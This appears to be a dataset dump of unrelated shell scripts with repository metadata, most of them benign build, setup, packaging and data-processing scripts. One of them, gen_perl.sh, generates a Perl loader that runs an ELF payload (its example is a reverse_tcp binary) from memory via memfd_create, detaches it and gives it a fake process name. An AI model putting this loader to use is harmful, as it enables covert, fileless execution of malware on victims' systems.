mkdir -p isodir/boot/grub
cp COS.bin isodir/boot/COS.bin
cp grub.cfg isodir/boot/grub/grub.cfg
grub-mkrescue -o COS.iso isodir
#run it in qemu
qemu-system-x86_64 -cdrom COS.iso
| true |
b04663d7a735bfae1632f0abd25ddb51d7067b16 | Shell | hieuha/Download-Data-Canadian-Astronomy | /red2.sh | UTF-8 | 2,750 | 3.734375 | 4 | [] | no_license | #! /bin/bash
# this script will only work if run using the source command (.)
# which will executie the script in the current (bash) shell
# Source: http://www.paulruffle.com/oracdr.htm
# note: should not need these as they should be in .bashrc
# export STARLINK_DIR=/hcm/Harry/Radio-Astronomy/Software/star-2015B
# source $STARLINK_DIR/etc/profile
CURRENT_FOLDER=`pwd`/
error_msg ()
{
echo
echo "Usage: source red2.sh datadir mypar"
echo "Example: source red2.sh hcop mypar.ini"
echo
}
MY_MOLECULAR=$CURRENT_FOLDER$1
MY_PARINI=$CURRENT_FOLDER$2
# set SLS data sub-directory from command line argument
SLS_DATA_DIR=$MY_MOLECULAR
# set data in and out paths to match standard jac oracdr pathnames
UTDATE=`date +%Y%m%d`
SLS_DATA_IN=${SLS_DATA_DIR}/raw
SLS_DATA_OUT=${SLS_DATA_DIR}/reduced/acsis/${UTDATE}
if [ $# -lt 2 ]; then
echo "Error! You have not specified enough parameters"
error_msg
exit 1
fi
# test for correct data sub-directory name
if [ ! -d "$MY_MOLECULAR" ]; then
echo "Error! Data sub-directory $MY_MOLECULAR does not exist"
return
else
MY_SERLIST=$SLS_DATA_IN/ser.list
/bin/ls -1 $MY_MOLECULAR/raw/*sdf* > $MY_SERLIST
fi
if [ ! -f "$MY_PARINI" ]; then
echo "parini file not found!"
exit 1
fi
if [ ! -f "$MY_PARINI" ]; then
echo "parini file not found!"
exit 1
fi
echo "Data directory: ${SLS_DATA_DIR}"
echo "UT date of obs: ${UTDATE}"
echo
# make a directory for the reduced data (but check first)
if [ -d ${SLS_DATA_OUT} ]; then
if [ -e ${SLS_DATA_OUT}/log.qa ]; then
echo "Warning! ${SLS_DATA_OUT}"
echo " output directory appears to contain reduced data"
else
echo "Warning! ${SLS_DATA_OUT}"
echo " output data directory already exists"
fi
echo ""
echo -n "Are you sure you want to continue? (y)es "
read ans
if [ "$ans" != "y" ] && [ "$ans" != "Y" ] ; then
echo ""
echo "OK terminating script"
echo ""
return
fi
echo""
else
mkdir -p ${SLS_DATA_OUT}
fi
export ORAC_DATA_ROOT=${SLS_DATA_DIR}
# call oracdr_acsis which sources oracdr_start.sh for ACSIS instrument
oracdr_acsis ${UTDATE}
# reset data in and out paths as oracdr_start.sh sets default paths!
#ORAC_DATA_IN: the location where data are read from.
#If running with -loop flag, this is the location of the flag files, rather than the data files.
export ORAC_DATA_IN=${SLS_DATA_IN}
export ORAC_DATA_OUT=${SLS_DATA_OUT}
export ORAC_NFS_OK=1
echo ORAC_DATA_IN=$ORAC_DATA_IN
echo ORAC_DATA_OUT=$ORAC_DATA_OUT
# now we can run oracdr
oracdr -loop file -files $MY_SERLIST REDUCE_SCIENCE_NARROWLINE -recpars $MY_PARINI -nodisplay -log s -batch
echo "Delete Raw $MY_SERLIST"
#rm -rf "$MY_MOLECULAR/raw/"
unset ORAC_DATA_IN
unset ORAC_DATA_OUT
| true |
27c9835ce18ad8bd0c254f205655c30024639956 | Shell | suevip/thor | /bin/thor.sh | UTF-8 | 1,554 | 3.671875 | 4 | [
"MIT"
] | permissive | #!/bin/sh
if [ x"$1" = x ]; then
echo "Usage : thor.sh [worker.properties] [connect.properties ...]"
exit 1
fi
jdk8=$(ls /usr/java/ | grep 1.8.0)
if [ "x$jdk8" = "x" ]; then
echo "Java version must be 1.8.0 or later! current version is "$JAVA_VERSION
exit
fi
jdk=""
for dir in $jdk8;
do
if [[ $dir > $jdk ]]; then
jdk=$dir
fi
done
export JAVA_HOME=/usr/java/$jdk
export CLASSPATH=.:$JAVA_HOME/lib:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib/dt.jar
export PATH=$JAVA_HOME/bin:$PATH
# JAVA_VERSION=$(java -version 2>&1 | awk 'NR==1{ gsub(/"/,""); print $3 }i' | awk -F '_' '{print $1}')
# if [[ "x$JAVA_VERSION" < "x1.8.0" ]]; then
# echo "Java version must be 1.8.0 or later! current version is "$JAVA_VERSION
# exit
# fi
base_dir=$(dirname $0)
if [ "x$THOR_LOG4J_OPTS" = "x" ]; then
export THOR_LOG4J_OPTS="-Dlog4j.configurationFile=file:$base_dir/../config/log4j2.xml"
fi
if [ "x$THOR_HEAP_OPTS" = "x" ]; then
export THOR_HEAP_OPTS="-Xmx1G -Xms1G"
fi
# EXTRA_ARGS="-name thor -loggc"
offset_line=$(sed -n '/^offset.storage.file.filename=/p' $1)
offset_file=${offset_line#*=}
if [ x"$offset_file" = x ]; then
echo $1" 中必须配置存储 offset 本地文件,例如:offset.storage.file.filename=/tmp/connect.offset"
exit 1
fi
offset_dir=${offset_file%/*}
if [ ${offset_dir:0:1} != "/" ]; then
offset_dir=$base_dir"/"$offset_dir
fi
if [ ! -d $offset_dir ]; then
mkdir -p $offset_dir
fi
exec $(dirname $0)/run-class.sh $EXTRA_ARGS org.apache.kafka.connect.cli.ConnectStandalone "$@"
| true |
035611e4097ad4602be06f41e43ca6c0f8ef9ac1 | Shell | janosh/macos-setup | /setup/system-settings.sh | UTF-8 | 2,523 | 3.734375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# --- Helper functions ---
trap 'exit 0' SIGINT # exit cleanly if aborted with ⌃c
request() { # Output a message and open an app.
local message="${1}"
local app="${2}"
shift 2
echo "$(tput setaf 5)•$(tput sgr0) ${message}"
open -Wa "${app}" --args "$@" # Don't continue until app closes.
}
request_preferences() { # 'request' for System Preferences.
request "${1}" 'System Preferences'
}
preferences_pane() { # Open 'System Preferences' in specified pane.
osascript -e "tell application \"System Preferences\"
reveal pane \"${1}\"
activate
end tell" &> /dev/null
}
preferences_pane_anchor() { # Open 'System Preferences' in specified pane and tab.
osascript -e "tell application \"System Preferences\"
reveal anchor \"${1}\" of pane \"${2}\"
activate
end tell" &> /dev/null
}
# Auto-close any open System Preferences panes, to prevent them from
# overriding settings we’re about to change
osascript -e 'tell application "System Preferences" to quit'
# --- Main script ---
echo "This scripts requires manual interaction. It opens the appropriate System Settings panels, informs what needs to be done, and pauses until System Settings is closed.
Unless prefixed with the message 'ALL TABS', all changes can be performed in the opened tab.
After the changes are done, close the app and the script will continue.
" | sed -E 's/ {2}//'
preferences_pane 'com.apple.preferences.Bluetooth'
request_preferences 'Add Bluetooth peripherals and show Bluetooth in menu bar.'
preferences_pane 'com.apple.preference.trackpad'
request_preferences 'Set Trackpad preferences.'
preferences_pane 'com.apple.preference.mouse'
request_preferences 'Set Mouse preferences.'
preferences_pane_anchor 'Mouse' 'com.apple.preference.universalaccess'
request_preferences 'Under "Trackpad Options…", enable three finger drag.'
preferences_pane_anchor 'Dictation' 'com.apple.preference.keyboard'
request_preferences 'Download other languages.'
preferences_pane 'com.apple.preferences.AppleIDPrefPane'
request_preferences "Check what you want synced to iCloud."
preferences_pane 'com.apple.preferences.internetaccounts'
request_preferences 'Remove Game Center.'
preferences_pane 'com.apple.preferences.users'
request_preferences 'Turn off Guest User account.'
preferences_pane 'com.apple.preference.printfax'
request_preferences 'Add printers.'
preferences_pane 'com.apple.preference.security'
request_preferences 'Set delay after sleep before prompting for password on wake.'
| true |
79f2dee932acba17d4874f44acc128bf7e6b7b2f | Shell | obaryo/Bash-Activities-Compilation | /task6_ sorting.sh | UTF-8 | 567 | 3.40625 | 3 | [] | no_license | array=()
echo "Input random integers: "
read arr
array+=($arr)
len=${#array[@]}
#echo $len
echo "Array in original order: "
echo ${array[@]}
for ((i = 0; i<$len; i++))
do
for((j = 0; j<$len-i-1; j++))
do
if [ ${array[j]} -gt ${array[$((j+1))]} ]
then
gt=${array[j]}
array[$j]=${array[$((j+1))]}
array[$((j+1))]=$gt
fi
done
done
echo
echo "Array after sorting:"
echo ${array[@]} | true |
20f2c1660153b3f206e1999c63e2e31c671b7ea4 | Shell | purpleroc/gen_perl | /gen_perl.sh | UTF-8 | 996 | 3.09375 | 3 | [] | no_license | #!/bin/sh
if [ 3 -ne $# ]; then
echo "Usage: ./gen_perl.sh [elf] [xx.pl] [proc_name]"
echo "eg: ./gen_perl.sh reverse_tcp hack.pl hackers"
exit 0
fi
# open /proc/xxx/xxx
echo "my \$name = \"\";
my \$fd = syscall(319, \$name, 1);
if (-1 == \$fd) {
die \"memfd_create: $!\";
}
open(my \$FH, '>&='.\$fd) or die \"open: \$!\";
select((select(\$FH), $|=1)[0]);
" > $2
# write binary to mem
perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./$1 >> $2
# exec binary with fork and named argv[3], and kill ppid
echo '
# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
die "setsid: $!";
}
# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
die "fork2: $!";
}
if (0 != $pid) { # Child terminates
exit 0;
}
exec {"/proc/$$/fd/$fd"} "'${3}'" or die "exec: $!";
' >> $2
| true |
934213bf7b83e70bb51684bef76efd709db8e48e | Shell | delkyd/alfheim_linux-PKGBUILDS | /haskell-curl/PKGBUILD | UTF-8 | 1,720 | 2.75 | 3 | [] | no_license | # Maintainer: Carsten Feuls <archlinux@carstenfeuls.de>
# Generated by hkg2arch --> https://github.com/christopherloen/hkg2arch
hkgname=curl
pkgname=haskell-curl
pkgrel=1
pkgver=1.3.8
pkgdesc='Haskell binding to libcurl'
arch=(any)
url='http://hackage.haskell.org/package/curl'
license=(BSD3)
depends=('ghc' 'haskell-base' 'haskell-bytestring' 'haskell-containers')
options=(strip)
source=(https://hackage.haskell.org/package/${hkgname}-${pkgver}/${hkgname}-${pkgver}.tar.gz)
sha256sums=('9087c936bfcdb865bad3166baa3f12bf37acf076fa76010e3b5f82a1d485446e')
prepare() {
cd ${srcdir}/${hkgname}-${pkgver}
runhaskell Setup.hs configure -O --enable-shared --enable-executable-dynamic \
--prefix=/usr --docdir="/usr/share/doc/${pkgname}" \
--dynlibdir=/usr/lib --libsubdir=\$compiler/site-local/\$pkgid \
-f-no-unicode -f-system-libyaml -f-no-exe -fno-examples
}
build() {
cd ${srcdir}/${hkgname}-${pkgver}
runhaskell Setup build
runhaskell Setup haddock
runhaskell Setup register --gen-script
runhaskell Setup unregister --gen-script
sed -i -r -e "s|ghc-pkg.*unregister[^ ]* |&'--force' |" unregister.sh
}
package() {
cd ${srcdir}/${hkgname}-${pkgver}
install -D -m744 register.sh "${pkgdir}/usr/share/haskell/register/${pkgname}.sh"
install -D -m744 unregister.sh "${pkgdir}/usr/share/haskell/unregister/${pkgname}.sh"
install -d -m755 ${pkgdir}/usr/share/doc/ghc/html/libraries
ln -s /usr/share/doc/${pkgname}/html ${pkgdir}/usr/share/doc/ghc/html/libraries/${hkgname}
runhaskell Setup copy --destdir=${pkgdir}
install -D -m644 LICENSE ${pkgdir}/usr/share/licenses/${pkgname}/LICENSE
rm -f ${pkgdir}/usr/share/doc/${pkgname}/LICENSE
}
| true |
d587c1c5408fad422af11e96372f0fcd93b2f97d | Shell | fajarrasyid/dotfiles | /.local/bin/status-bar/battery | UTF-8 | 823 | 3.0625 | 3 | [
"MIT"
] | permissive | #! /bin/sh
bat=$(cat /sys/class/power_supply/BAT0/capacity)
status=$(cat /sys/class/power_supply/BAT0/status)
ramp10=
ramp20=
ramp30=
ramp40=
ramp50=
ramp60=
ramp70=
ramp80=
ramp90=
ramp100=
if [[ $bat -lt 10 ]]; then
echo " $ramp10 $bat% "
elif [[ $bat -lt 20 ]]; then
echo " $ramp20 $bat% "
elif [[ $bat -lt "30" ]]; then
echo " $ramp30 $bat% "
elif [[ $bat -lt "40" ]]; then
echo " $ramp40 $bat% "
elif [[ $bat -lt "50" ]]; then
echo " $ramp50 $bat% "
elif [[ $bat -lt "60" ]]; then
echo " $ramp60 $bat% "
elif [[ $bat -lt "70" ]]; then
echo " $ramp70 $bat% "
elif [[ $bat -lt "80" ]]; then
echo " $ramp80 $bat% "
elif [[ $bat -lt "90" ]]; then
echo " $ramp90 $bat% "
elif [[ $bat -le "100" ]]; then
echo " $ramp100 $bat% "
fi
| true |
3e9435d254ac0886bdadefc02bc033af934b46d9 | Shell | hilldr/STM_dual_rnaseq | /src/download_genomes.sh | UTF-8 | 1,278 | 2.8125 | 3 | [] | no_license | #! /bin/bash
## script to download and index bacterial genomes
## for RNA-seq alignment in kallisto
## DAVID R. HILL
## -----------------------------------------------------------------------------
## make directory for genomes
mkdir -p ../data/genomes
## Salmonella enterica subsp. enterica serovar Enteritidis str. P125109
## GenBank: AM933172.1
rsync --copy-links --times --verbose rsync://ftp.ncbi.nlm.nih.gov/genomes/refseq/bacteria/Salmonella_enterica/latest_assembly_versions/GCF_000009505.1_ASM950v1/GCF_000009505.1_ASM950v1_cds_from_genomic.fna.gz ../data/genomes
## Salmonella enterica Subsp. enterica serovar Typhi Ty2
## Genbank: AE014613.1
rsync --copy-links --times --verbose rsync://ftp.ncbi.nlm.nih.gov/genomes/refseq/bacteria/Salmonella_enterica/latest_assembly_versions/GCF_000007545.1_ASM754v1/GCF_000007545.1_ASM754v1_cds_from_genomic.fna.gz ../data/genomes
## Salmonella enterica Subsp. enterica serovar Typhimurium SL1344
## GenBank: FQ312003.1
rsync --copy-links --times --verbose rsync://ftp.ncbi.nlm.nih.gov/genomes/refseq/bacteria/Salmonella_enterica/latest_assembly_versions/GCF_000210855.2_ASM21085v2/GCF_000210855.2_ASM21085v2_cds_from_genomic.fna.gz ../data/genomes
for file in ../data/genomes/*.fna.gz
do
kallisto index -i $file\.idx $file
done
| true |
0e6f6b32009838e82b8800bc6ecb14f59d40d447 | Shell | Guillem96/hollow-knight-nx-skin-converter | /generate-skins.sh | UTF-8 | 994 | 3.8125 | 4 | [] | no_license | #!/bin/bash
GAMEID=0100633007D48000
RELEASEDIR=release
counter=1
nSkins=$(ls -1 txt-packs/ | wc -l)
for skinPath in txt-packs/* ; do
echo "-- Generate skins [${counter}/${nSkins}] ----------------------------"
python hk-skin-nx.py \
--dump-path ${GAMEID} \
--skin "${skinPath}" --output ${RELEASEDIR}
counter=$((counter+1))
done
counter=1
# Move to an "isolated area" so zip compressed files have the desired name
cwd=$(pwd)
ls -1 -d ${cwd}/${RELEASEDIR}/* | while read skinPath; do
mkdir -p ${RELEASEDIR}/tmp/${GAMEID}/romfs
cd ${RELEASEDIR}/tmp/
echo "-- Compressing skins [${counter}/${nSkins}] -------------------------"
zipFileName=$(echo ${skinPath} | tr -s '[:blank:]' '_')
# Copy the needed files to the current working directory
mkdir -p ${GAMEID}
cp -r "${skinPath}/${GAMEID}/romfs" ${GAMEID}
# Zip Game id folder
zip -r ${zipFileName}.zip "${GAMEID}/"
counter=$((counter+1))
done
rm -rf ${RELEASEDIR}/tmp | true |
b218c1c6ac23331553e931d3eee5abeb6115f982 | Shell | google-code/android-io-model | /samsung/app/Facebook/plot.sh | UTF-8 | 851 | 2.875 | 3 | [] | no_license |
for dat_file in `cat dat_list`
do
#io type
./plot_io_type.sh
mv io_type.pdf ${dat_file}_io_type.pdf
# random read
ls --color=none|grep config_log_|grep 2_35_35.expected|python plot2.py $dat_file 0 4 random_read
mv tmp.pdf ${dat_file}_rr.pdf
# random write
ls --color=none|grep config_log_1_|grep 35_35.expected|python plot2.py $dat_file 1 4 random_write
mv tmp.pdf ${dat_file}_rw.pdf
# sequential read
ls --color=none|grep config_log_1_2_|grep 35.expected|python plot2.py $dat_file 2 4 seq_read
mv tmp.pdf ${dat_file}_sr.pdf
# sequential write
ls --color=none|grep config_log_1_2_35_|python plot2.py $dat_file 3 4 seq_write
mv tmp.pdf ${dat_file}_sw.pdf
pdfnup --no-tidy --nup 2x3 ${dat_file}_io_type.pdf ${dat_file}_rr.pdf ${dat_file}_rw.pdf ${dat_file}_sr.pdf ${dat_file}_sw.pdf
mv ${dat_file}_sw-nup.pdf ${dat_file}_2x3.pdf
done
| true |
9347c6bb69194bfd79168efd21676e79ab468c36 | Shell | delkyd/alfheim_linux-PKGBUILDS | /enigma_sdl/PKGBUILD | UTF-8 | 1,066 | 2.65625 | 3 | [] | no_license | # Contributor: Nagy Gabor <Gabor.V.Nagy@@gmail.com>
pkgname=enigma_sdl
pkgver=1.21
pkgrel=2
pkgdesc="Puzzle game inspired by Oxyd on the Atari ST and Rock'n'Roll on the Amiga."
url="http://www.nongnu.org/enigma/"
depends=('libpng' 'sdl_image' 'sdl_mixer' 'sdl_ttf' 'xerces-c' 'xdg-utils' 'curl')
makedepends=('imagemagick')
source=(http://downloads.sourceforge.net/enigma-game/enigma-$pkgver.tar.gz
std-gnu03.patch)
sha256sums=('d872cf067d8eb560d3bb1cb17245814bc56ac3953ae1f12e2229c8eb6f82ce01'
'a606faf8f2f55c08a9a49a6ec8bce764422b749bb458733a27aba8cb2cf6b78e')
license=('GPL')
arch=('i686' 'x86_64')
build() {
cd $srcdir/enigma-$pkgver
patch -Np1 -i $srcdir/std-gnu03.patch
autoconf
./configure --prefix=/usr --program-suffix=_sdl --sysconfdir=/etc --disable-sdltest --enable-optimize
make
}
package(){
cd $srcdir/enigma-$pkgver
make DESTDIR=$pkgdir install
# removing enet files to avoid file conflicts
rm -R $pkgdir/usr/include/
rm -R $pkgdir/usr/lib/
sed -i s/Exec=enigma/Exec=enigma_sdl/ $pkgdir/usr/share/applications/enigma.desktop
}
| true |
7386aa6431bdb644d22f6c69e9bfa7c85f0bf641 | Shell | wonview/software-mac | /software-mac/6051.Q0.1007.04.000000/host_drivers/Linux/ssv6xxx/script/.svn/text-base/pack.svn-base | UTF-8 | 1,395 | 3.625 | 4 | [
"ISC"
] | permissive | #!/bin/bash
TARGET_DIR=pack
rm -rf $TARGET_DIR
src_c=`find . -name "*.c"`
src_h=`find . -name "*.h"`
src_mk=`find . \( -name Makefile -o -name "*.mak" \)`
mkdir -p /tmp/pack > /dev/null
# Process each source code in .c and .h.
for src in $src_c $src_h; do
mkdir -p "/tmp/pack/`dirname $src`" > /dev/null
echo "Processing $src..."
dir="$TARGET_DIR/`dirname $src`"
src_name="`basename $src`"
if [ ! -d $dir ]; then
mkdir -p $dir
fi
# Remove comment using preprocessor.
# And use indent to make the result comfort to Linux coding style
cat script/license.txt > "$dir/$src_name"
gcc -fpreprocessed -dD -E -P -std=gnu99 $src > /tmp/pack/$src
#cat /tmp/pack/$src | \
#indent -bad -bap -bbb -nbc -bbo -hnl -br -brs -c33 -cd33 -ncdb -ce -ci4 \
#-cli0 -d0 -di1 -nfc1 -i8 -ip0 -l80 -lp -npcs -nprs -npsl -sai \
#-saf -saw -ncs -nsc -sob -nfca -cp33 -ss -ts8 -il1 /tmp/pack/$src -o "$dir/$src_name"
clang-format-3.4 -style='{BasedOnStyle: LLVM, UseTab: Always, IndentWidth: 8, BreakBeforeBraces: Linux, AllowShortIfStatementsOnASingleLine: false, IndentCaseLabels: false}' \
/tmp/pack/$src > "$dir/$src_name"
#$src | script/stripcmt > "$dir/$src_name"
done
# Copy every Makefile
for src in $src_mk; do
cp $src "$TARGET_DIR/$src"
done
# No firmware code
rm -rf "$TARGET_DIR/ssv6200smac/firmware"
# Copy scripts and FW image
cp -r image script *.sh $TARGET_DIR
| true |
b9c668855c7d49f51751bdf7282fbe196da930d0 | Shell | ekmixon/eclipsefuro | /furo/template/scripts/gprcgateway/generate.sh | UTF-8 | 286 | 2.640625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
TARGETDIR=pkg/grpc-gateway
mkdir -p $TARGETDIR
# the registration of the services..
furo exportAsYaml | simple-generator -t scripts/gprcgateway/autoregister.go.tpl > $TARGETDIR/autoregister.go
# beautify
go fmt $TARGETDIR/autoregister.go
echo "gateway sources generated" | true |
92664e93e1df3142d58c9723c65f941d6ca4dfcd | Shell | tiborsimon/dotfiles | /configs/git/scripts/git-checkown.bash | UTF-8 | 309 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
user=$(git config user.name)
branch=$(git for-each-ref --format='%(authorname)=%(refname)' --sort=-authordate |
grep -i "$user" |
cut -d'=' -f2 |
sed 's%refs/heads/%%' |
sed 's%refs/remotes/origin/%%' |
uniq |
fzy)
if [ -n "$branch" ]
then
git checkout $branch
fi
| true |
d994a17049f730d048c1ea72075561d4643dc72c | Shell | yuksbg/easymail | /init.sh | UTF-8 | 12,257 | 3.015625 | 3 | [] | no_license | #BASIC
CURRENT_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
# What I have to improve in this script.
# Collect all password in one place in the beginning.
# Collect all hostname in one place in the beginning.
# Configure SpamAssassin
# Make satisfaction way for certificate.
# Roundube password can not be changed must be fixed.
##################
# Specific for Docker
#/usr/sbin/dovecot
#service postfix status
#service mysql start
##################
# Example for Docker
# apt-get update && apt-get install docker.io -y
# docker run -it -p=110:110 -p=25:25 -p=995:995 -p=8080:80 -p=587:587 -p=993:993 -p=143:143 -h cursedly-host.gzeki.com --name="email_server" ubuntu:14.04 /bin/sh -c "if [ -f /run.sh ]; then bash /run.sh; fi; exec /bin/bash"
###################
debconf-set-selections <<< 'mysql-server mysql-server/root_password password YOUR_PASSWORD'
debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password YOUR_PASSWORD'
debconf-set-selections <<< "postfix postfix/mailname string cursedly-host.gzeki.com"
debconf-set-selections <<< "postfix postfix/main_mailer_type string 'Internet Site'"
debconf-set-selections <<< "dovecot-core dovecot-core/ssl-cert-exists string error"
debconf-set-selections <<< "dovecot-core dovecot-core/ssl-cert-name string localhost"
debconf-set-selections <<< "dovecot-core dovecot-core/create-ssl-cert boolean true"
apt-get update && apt-get install expect postfix postfix-mysql dovecot-core dovecot-imapd dovecot-pop3d dovecot-lmtpd dovecot-mysql mysql-server -y
mysql_install_db
expect -c "
set timeout 10
spawn mysql_secure_installation
expect \"Enter current password for root (enter for none):\"
send \"YOUR_PASSWORD\r\"
expect \"Change the root password?\"
send \"n\r\"
expect \"Remove anonymous users?\"
send \"y\r\"
expect \"Disallow root login remotely?\"
send \"y\r\"
expect \"Remove test database and access to it?\"
send \"y\r\"
expect \"Reload privilege tables now?\"
send \"y\r\"
expect eof"
mysqladmin -uroot -pYOUR_PASSWORD create mailserver
mysql -uroot -pYOUR_PASSWORD << EOF
GRANT SELECT ON mailserver.* TO 'mailuser'@'127.0.0.1' IDENTIFIED BY 'mailuserpass';
FLUSH PRIVILEGES;
USE mailserver;
CREATE TABLE \`virtual_domains\` (
\`id\` int(11) NOT NULL auto_increment,
\`name\` varchar(50) NOT NULL,
PRIMARY KEY (\`id\`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE \`virtual_users\` (
\`id\` int(11) NOT NULL auto_increment,
\`domain_id\` int(11) NOT NULL,
\`password\` varchar(106) NOT NULL,
\`email\` varchar(100) NOT NULL,
PRIMARY KEY (\`id\`),
UNIQUE KEY \`email\` (\`email\`),
FOREIGN KEY (domain_id) REFERENCES virtual_domains(id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE \`virtual_aliases\` (
\`id\` int(11) NOT NULL auto_increment,
\`domain_id\` int(11) NOT NULL,
\`source\` varchar(100) NOT NULL,
\`destination\` varchar(100) NOT NULL,
PRIMARY KEY (\`id\`),
FOREIGN KEY (domain_id) REFERENCES virtual_domains(id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO \`mailserver\`.\`virtual_domains\` (\`id\` ,\`name\`)
VALUES('1', 'cursedly-host.gzeki.com');
INSERT INTO \`mailserver\`.\`virtual_users\` (\`id\`, \`domain_id\`, \`password\` , \`email\`)
VALUES ('1', '1', '\$1\$pfhfftkU\$3/0sv66/HiM0Dn6l3qRiq/', 'admin@cursedly-host.gzeki.com');
# This password $1$pfhfftkU$3/0sv66/HiM0Dn6l3qRiq/ IS 123456
# note must escape \$ in that way in linux EOP
INSERT INTO \`mailserver\`.\`virtual_aliases\` (\`id\`, \`domain_id\`, \`source\`, \`destination\`)
VALUES('1', '1', 'alias@cursedly-host.gzeki.com', 'admin@cursedly-host.gzeki.com');
EOF
cp /etc/postfix/main.cf /etc/postfix/main.cf.orig
postconf -e mydestination=localhost
postconf -# smtpd_tls_session_cache_database
postconf -# smtp_tls_session_cache_database
postconf -e smtpd_tls_cert_file=/etc/dovecot/dovecot.pem
postconf -e smtpd_tls_key_file=/etc/dovecot/private/dovecot.pem
postconf -e smtpd_use_tls=yes
postconf -e smtpd_tls_auth_only=yes
postconf -e smtpd_sasl_type=dovecot
postconf -e smtpd_sasl_path=private/auth
postconf -e smtpd_sasl_auth_enable=yes
postconf -e smtpd_recipient_restrictions=permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination
postconf -e virtual_transport=lmtp:unix:private/dovecot-lmtp
postconf -e virtual_mailbox_domains=mysql:/etc/postfix/mysql-virtual-mailbox-domains.cf
postconf -e virtual_mailbox_maps=mysql:/etc/postfix/mysql-virtual-mailbox-maps.cf
postconf -e virtual_alias_maps=mysql:/etc/postfix/mysql-virtual-alias-maps.cf
echo "
user = mailuser
password = mailuserpass
hosts = 127.0.0.1
dbname = mailserver
query = SELECT 1 FROM virtual_domains WHERE name='%s'
" > /etc/postfix/mysql-virtual-mailbox-domains.cf
echo "
user = mailuser
password = mailuserpass
hosts = 127.0.0.1
dbname = mailserver
query = SELECT 1 FROM virtual_users WHERE email='%s'
" > /etc/postfix/mysql-virtual-mailbox-maps.cf
echo "
user = mailuser
password = mailuserpass
hosts = 127.0.0.1
dbname = mailserver
query = SELECT destination FROM virtual_aliases WHERE source='%s'
" > /etc/postfix/mysql-virtual-alias-maps.cf
cp /etc/postfix/master.cf /etc/postfix/master.cf.orig
cp /etc/dovecot/dovecot.conf /etc/dovecot/dovecot.conf.orig
cp /etc/dovecot/conf.d/10-mail.conf /etc/dovecot/conf.d/10-mail.conf.orig
cp /etc/dovecot/conf.d/10-auth.conf /etc/dovecot/conf.d/10-auth.conf.orig
cp /etc/dovecot/dovecot-sql.conf.ext /etc/dovecot/dovecot-sql.conf.ext.orig
cp /etc/dovecot/conf.d/10-master.conf /etc/dovecot/conf.d/10-master.conf.orig
cp /etc/dovecot/conf.d/10-ssl.conf /etc/dovecot/conf.d/10-ssl.conf.orig
echo "
#Automatic added by script for auto install mail server.
smtps inet n - - - - smtpd
submission inet n - - - - smtpd
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
-o smtpd_client_restrictions=permit_sasl_authenticated,reject
" >> /etc/postfix/master.cf
echo "
#Automatic added by script for auto install mail server.
protocols = imap pop3 lmtp
" >> /etc/dovecot/dovecot.conf
sed -i "s/mail_location = .*/mail_location = maildir:\/var\/mail\/vhosts\/%d\/\%n/g" /etc/dovecot/conf.d/10-mail.conf
sed -i "s/#mail_privileged_group =/mail_privileged_group = mail/g" /etc/dovecot/conf.d/10-mail.conf
mkdir -p /var/mail/vhosts/cursedly-host.gzeki.com
groupadd -g 5000 vmail
useradd -g vmail -u 5000 vmail -d /var/mail
chown -R vmail:vmail /var/mail
sed -i "s/^#disable_plaintext_auth = .*/disable_plaintext_auth = yes/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/^auth_mechanisms = .*/auth_mechanisms = plain login/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/\!include auth-system.conf.ext/#\!include auth-system.conf.ext/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/#\!include auth-sql.conf.ext/\!include auth-sql.conf.ext/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/#ssl = .*/ssl = required/g" /etc/dovecot/conf.d/10-ssl.conf
echo '
passdb {
driver = sql
args = /etc/dovecot/dovecot-sql.conf.ext
}
userdb {
driver = static
args = uid=vmail gid=vmail home=/var/mail/vhosts/%d/%n
}
' > /etc/dovecot/conf.d/auth-sql.conf.ext
echo "
driver = mysql
connect = host=127.0.0.1 dbname=mailserver user=mailuser password=mailuserpass
default_pass_scheme = CRYPT
password_query = SELECT email as user, password FROM virtual_users WHERE email='%u';
" >> /etc/dovecot/dovecot-sql.conf.ext
chown -R vmail:dovecot /etc/dovecot
chmod -R o-rwx /etc/dovecot
cp $CURRENT_DIR/10-master.conf /etc/dovecot/conf.d/10-master.conf
service dovecot restart
service postfix restart
# INSTALL Roundcube and all its dependences
apt-get install nginx php5-fpm php5-mcrypt php5-intl php5-mysql -y
rm -r /etc/nginx/sites-enabled/*
cp $CURRENT_DIR/nginx_config_for_roundcube /etc/nginx/sites-enabled/roundcube
cd /tmp && wget http://netcologne.dl.sourceforge.net/project/roundcubemail/roundcubemail/1.1.1/roundcubemail-1.1.1-complete.tar.gz
tar -xvzf roundcubemail-1.1.1-complete.tar.gz
mkdir /usr/share/roundcubemail
cp -r roundcubemail-1.1.1/ /usr/share/nginx/roundcubemail
cd /usr/share/nginx/roundcubemail/
sed -i "s/;cgi.fix_pathinfo=.*/cgi.fix_pathinfo=0/" /etc/php5/fpm/php.ini
mysqladmin -uroot -pYOUR_PASSWORD create roundcube
mysql -uroot -pYOUR_PASSWORD << EOF
GRANT SELECT ON roundcube.* TO 'roundcube'@'127.0.0.1' IDENTIFIED BY '';
